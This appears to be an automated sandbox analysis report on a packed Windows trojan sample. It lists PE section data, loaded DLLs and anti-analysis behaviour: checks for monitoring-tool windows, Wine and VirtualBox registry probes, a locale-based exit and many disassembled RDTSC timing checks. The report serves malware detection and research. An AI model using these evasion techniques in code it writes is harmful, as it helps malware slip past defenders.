              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01370B350_2_01370B35
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0123E3590_2_0123E359
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01363BD00_2_01363BD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01366A6A0_2_01366A6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013602E50_2_013602E5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013745B00_2_013745B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013684F30_2_013684F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01369F4F0_2_01369F4F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0136EFB90_2_0136EFB9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01333EAC0_2_01333EAC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012FEEF30_2_012FEEF3
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FB4A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: quxdhurw ZLIB complexity 0.9946667435424354
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00FD3A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00FCCAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\YFSDK8XQ.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1771008 > 1048576
              Source: file.exeStatic PE information: Raw size of quxdhurw is bigger than: 0x100000 < 0x196800

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.fb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;quxdhurw:EW;mjwebezn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;quxdhurw:EW;mjwebezn:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FD6390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b0d03 should be: 0x1b3017
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: quxdhurw
              Source: file.exeStatic PE information: section name: mjwebezn
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01483142 push 40AEECD8h; mov dword ptr [esp], esi0_2_01483171
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013E891E push ecx; mov dword ptr [esp], ebx0_2_013E895A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013F4911 push ecx; mov dword ptr [esp], edx0_2_013F4935
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013E7965 push ebx; mov dword ptr [esp], 7DE76277h0_2_013E7989
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013E7965 push esi; mov dword ptr [esp], 7FDF2EE6h0_2_013E79BE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013E7965 push esi; mov dword ptr [esp], ecx0_2_013E79DA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013E7965 push 7AF4554Fh; mov dword ptr [esp], esi0_2_013E79F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD7895 push ecx; ret 0_2_00FD78A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0141692A push edi; mov dword ptr [esp], esi0_2_0141692E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012D69A0 push ebp; mov dword ptr [esp], edx0_2_012D69BB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012D69A0 push 23BBFA70h; mov dword ptr [esp], ebx0_2_012D69F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012D69A0 push edi; mov dword ptr [esp], ebx0_2_012D6ADD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0120098C push 49889E4Eh; mov dword ptr [esp], edi0_2_01201323
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0120098C push ebp; mov dword ptr [esp], 3C638500h0_2_01201327
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014009FE push esi; mov dword ptr [esp], eax0_2_01400A1C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129C1EE push ebx; mov dword ptr [esp], eax0_2_0129C28F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129C1EE push 7B4A894Dh; mov dword ptr [esp], eax0_2_0129C29F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129C1EE push 4058D30Fh; mov dword ptr [esp], ebx0_2_0129C2FC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129C1EE push ecx; mov dword ptr [esp], 77FCE2ACh0_2_0129C343
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129C1EE push 0ED8C5A3h; mov dword ptr [esp], ebp0_2_0129C3ED
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129C1EE push eax; mov dword ptr [esp], esi0_2_0129C483
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013A71CC push 3351E752h; mov dword ptr [esp], eax0_2_013A71EA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012271D5 push 17ED1589h; mov dword ptr [esp], ebx0_2_01227267
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012271D5 push 54786F3Bh; mov dword ptr [esp], eax0_2_01227284
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012271D5 push ebp; mov dword ptr [esp], 0E1C59D5h0_2_01227288
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012271D5 push ebx; mov dword ptr [esp], 7BFF97FDh0_2_01227293
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012271D5 push edx; mov dword ptr [esp], 5518639Dh0_2_01227320
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012CB022 push esi; mov dword ptr [esp], ecx0_2_012CB04C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012CB022 push 2BB2369Eh; mov dword ptr [esp], ebp0_2_012CB0C2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012CB022 push edx; mov dword ptr [esp], ebp0_2_012CB0D9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012CB022 push eax; mov dword ptr [esp], 5B40D470h0_2_012CB0F2
              Source: file.exeStatic PE information: section name: quxdhurw entropy: 7.9529360698674845

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FD6390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25265
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200245 second address: 120024C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1378E89 second address: 1378E8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1378E8D second address: 1378E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136D07C second address: 136D08B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F437936CE26h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377E84 second address: 1377E88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377E88 second address: 1377EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F437936CE36h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F437936CE34h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13785CB second address: 13785E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4379279206h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AE9A second address: 137AEA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AF77 second address: 137AFAA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edi 0x0000000d jmp 00007F43792791FBh 0x00000012 pop edi 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007F43792791FFh 0x0000001b push eax 0x0000001c push edx 0x0000001d jc 00007F43792791F6h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AFAA second address: 137AFE3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F437936CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jnp 00007F437936CE32h 0x00000015 pop eax 0x00000016 sub ecx, 265FB444h 0x0000001c lea ebx, dword ptr [ebp+1244ED9Ah] 0x00000022 mov ecx, dword ptr [ebp+122D2BF4h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B047 second address: 137B04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B04C second address: 137B0F1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F437936CE2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F437936CE34h 0x00000010 nop 0x00000011 add dword ptr [ebp+122D1BE7h], ecx 0x00000017 push 00000000h 0x00000019 push 02C81B80h 0x0000001e pushad 0x0000001f jg 00007F437936CE28h 0x00000025 pushad 0x00000026 popad 0x00000027 pushad 0x00000028 jmp 00007F437936CE32h 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 popad 0x00000031 xor dword ptr [esp], 02C81B00h 0x00000038 jnl 00007F437936CE29h 0x0000003e mov edx, dword ptr [ebp+122D2B2Ch] 0x00000044 push 00000003h 0x00000046 movzx ecx, ax 0x00000049 push 00000000h 0x0000004b push 00000003h 0x0000004d jmp 00007F437936CE30h 0x00000052 call 00007F437936CE29h 0x00000057 push eax 0x00000058 jmp 00007F437936CE2Dh 0x0000005d pop eax 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push edi 0x00000062 jg 00007F437936CE26h 0x00000068 pop edi 0x00000069 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B0F1 second address: 137B13D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4379279209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ebx 0x0000000e jmp 00007F4379279204h 0x00000013 pop ebx 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 pushad 0x00000018 je 00007F43792791F6h 0x0000001e push edx 0x0000001f pop edx 0x00000020 popad 0x00000021 jbe 00007F43792791FCh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B13D second address: 137B159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F437936CE31h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B159 second address: 137B1A3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43792791FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b or si, 5320h 0x00000010 lea ebx, dword ptr [ebp+1244EDA3h] 0x00000016 mov edi, ebx 0x00000018 js 00007F4379279212h 0x0000001e push eax 0x0000001f jg 00007F43792791FEh 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B213 second address: 137B21D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B21D second address: 137B221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B221 second address: 137B225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B225 second address: 137B23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43792791FAh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B23B second address: 137B241 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B241 second address: 137B251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43792791FCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139B801 second address: 139B80C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399590 second address: 139959C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnc 00007F43792791F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139959C second address: 13995A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399728 second address: 139972C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399A7B second address: 1399A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399BB8 second address: 1399BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399BBC second address: 1399BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399BC0 second address: 1399BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399BCA second address: 1399BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399BCE second address: 1399BEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4379279200h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnp 00007F43792791F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399FD7 second address: 1399FF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F437936CE35h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399FF0 second address: 1399FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F43792791FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399FFE second address: 139A00E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jnl 00007F4379371466h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139A00E second address: 139A02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F437936CE2Dh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jmp 00007F437936CE2Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139A02F second address: 139A04B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4379371478h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139A166 second address: 139A16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139A4BD second address: 139A4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4379371466h 0x0000000a jl 00007F4379371466h 0x00000010 popad 0x00000011 jmp 00007F4379371476h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13705D7 second address: 1370612 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F437936CE2Eh 0x0000000b pushad 0x0000000c jmp 00007F437936CE31h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F437936CE2Bh 0x0000001a popad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139B075 second address: 139B0A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007F437937146Bh 0x0000000c jmp 00007F4379371475h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139EAB4 second address: 139EABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D315 second address: 139D319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0D5D second address: 13A0D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007F437936CE26h 0x0000000e pop ebx 0x0000000f jbe 00007F437936CE2Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136305F second address: 1363063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1363063 second address: 1363073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F437936CE26h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1363073 second address: 1363077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A7085 second address: 13A708A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A708A second address: 13A7094 instructions: 0x00000000 rdtsc 0x00000002 js 00007F437937147Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A7094 second address: 13A70C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F437936CE32h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F437936CE37h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A70C6 second address: 13A70DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4379371473h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A6848 second address: 13A6858 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F437936CE2Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A69A8 second address: 13A69AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A6C48 second address: 13A6C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A6D74 second address: 13A6D7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A6D7A second address: 13A6DC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F437936CE26h 0x0000000b jmp 00007F437936CE36h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F437936CE34h 0x0000001a js 00007F437936CE2Eh 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A6EFE second address: 13A6F0D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4379371466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
